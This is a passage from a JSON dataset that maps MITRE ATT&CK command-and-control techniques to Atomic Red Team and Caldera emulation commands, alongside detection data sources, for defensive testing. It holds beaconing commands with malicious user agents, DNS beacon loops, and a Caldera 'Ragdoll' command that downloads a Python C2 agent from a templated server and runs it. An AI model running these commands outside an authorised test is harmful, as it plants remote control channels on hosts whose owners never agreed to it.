This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + 
"Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": 
"executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/file/1080281/download", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1071.001", + "command_list": [ + "Invoke-WebRequest www.google.com -UserAgent \"HttpBrowser/1.0\" | out-null\nInvoke-WebRequest www.google.com -UserAgent 
\"Wget/1.9+cvs-stable (Red Hat modified)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Opera/8.81 (Windows NT 6.0; U; en)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"*<|>*\" | out-null\n", + "#{curl_path} -s -A \"HttpBrowser/1.0\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"*<|>*\" -m3 www.google.com >nul 2>&1\n", + "C:\\Windows\\System32\\Curl.exe -s -A \"HttpBrowser/1.0\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"*<|>*\" -m3 #{domain} >nul 2>&1\n", + "curl -s -A \"HttpBrowser/1.0\" -m3 www.google.com\ncurl -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com\ncurl -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com\ncurl -s -A \"*<|>*\" -m3 www.google.com\n", + "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n" + ], + "commands": [ + { + "command": "Invoke-WebRequest www.google.com -UserAgent \"HttpBrowser/1.0\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Wget/1.9+cvs-stable (Red Hat modified)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"Opera/8.81 (Windows NT 6.0; U; en)\" | out-null\nInvoke-WebRequest www.google.com -UserAgent \"*<|>*\" | out-null\n", + "source": 
"atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "#{curl_path} -s -A \"HttpBrowser/1.0\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com >nul 2>&1\n#{curl_path} -s -A \"*<|>*\" -m3 www.google.com >nul 2>&1\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -s -A \"HttpBrowser/1.0\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain} >nul 2>&1\nC:\\Windows\\System32\\Curl.exe -s -A \"*<|>*\" -m3 #{domain} >nul 2>&1\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "curl -s -A \"HttpBrowser/1.0\" -m3 www.google.com\ncurl -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 www.google.com\ncurl -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 www.google.com\ncurl -s -A \"*<|>*\" -m3 www.google.com\n", + "source": "atomics/T1071.001/T1071.001.yaml", + "name": "Atomic Red Team Test - Application Layer Protocol: Web Protocols" + }, + { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "source": "data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml", + "name": "A Python agent which communicates via the HTML contact" + }, + { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" 
$server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "source": "data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml", + "name": "A Python agent which communicates via the HTML contact" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1071.001", + "display_name": "Application Layer Protocol: Web Protocols", + "atomic_tests": [ + { + "name": "Malicious User Agents - Powershell", + "auto_generated_guid": "81c13829-f6c9-45b8-85a6-053366d55297", + "description": "This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. \nUse an application such as Wireshark to record the session and observe user agent strings and responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "www.google.com" + } + }, + "executor": { + "command": "Invoke-WebRequest #{domain} -UserAgent \"HttpBrowser/1.0\" | out-null\nInvoke-WebRequest #{domain} -UserAgent \"Wget/1.9+cvs-stable (Red Hat modified)\" | out-null\nInvoke-WebRequest #{domain} -UserAgent \"Opera/8.81 (Windows NT 6.0; U; en)\" | out-null\nInvoke-WebRequest #{domain} -UserAgent \"*<|>*\" | out-null\n", + "name": "powershell" + } + }, + { + "name": "Malicious User Agents - CMD", + "auto_generated_guid": "dc3488b0-08c7-4fea-b585-905c83b48180", + "description": "This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. 
\nUse an application such as Wireshark to record the session and observe user agent strings and responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "www.google.com" + }, + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system \n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip\" -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.71.1-win32-mingw\\bin\\curl.exe #{curl_path}\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + } + ], + "executor": { + "command": "#{curl_path} -s -A \"HttpBrowser/1.0\" -m3 #{domain} >nul 2>&1\n#{curl_path} -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain} >nul 2>&1\n#{curl_path} -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain} >nul 2>&1\n#{curl_path} -s -A \"*<|>*\" -m3 #{domain} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Malicious User Agents - Nix", + "auto_generated_guid": "2d7c471a-e887-4b78-b0dc-b0df1f2e0658", + "description": "This test simulates an infected host beaconing to command and control.\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "domain": { + "description": "Default domain to simulate against", + 
"type": "String", + "default": "www.google.com" + } + }, + "executor": { + "command": "curl -s -A \"HttpBrowser/1.0\" -m3 #{domain}\ncurl -s -A \"Wget/1.9+cvs-stable (Red Hat modified)\" -m3 #{domain}\ncurl -s -A \"Opera/8.81 (Windows NT 6.0; U; en)\" -m3 #{domain}\ncurl -s -A \"*<|>*\" -m3 #{domain}\n", + "name": "sh" + } + } + ] + }, + { + "id": "0ab383be-b819-41bf-91b9-1bd4404d83bf", + "name": "Ragdoll", + "description": "A Python agent which communicates via the HTML contact", + "tactic": "command-and-control", + "technique": { + "attack_id": "T1071.001", + "name": "Application Layer Protocol: Web Protocols" + }, + "platforms": { + "darwin": { + "sh": { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "cleanup": "pkill -f ragdoll\n" + } + }, + "linux": { + "sh": { + "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n", + "cleanup": "pkill -f ragdoll\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1071.004", + "command_list": [ + "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"TXT\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}\" -QuickTimeout}\n", + null, + "for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type \"#{query_type}\" \"#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\" -QuickTimeout}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 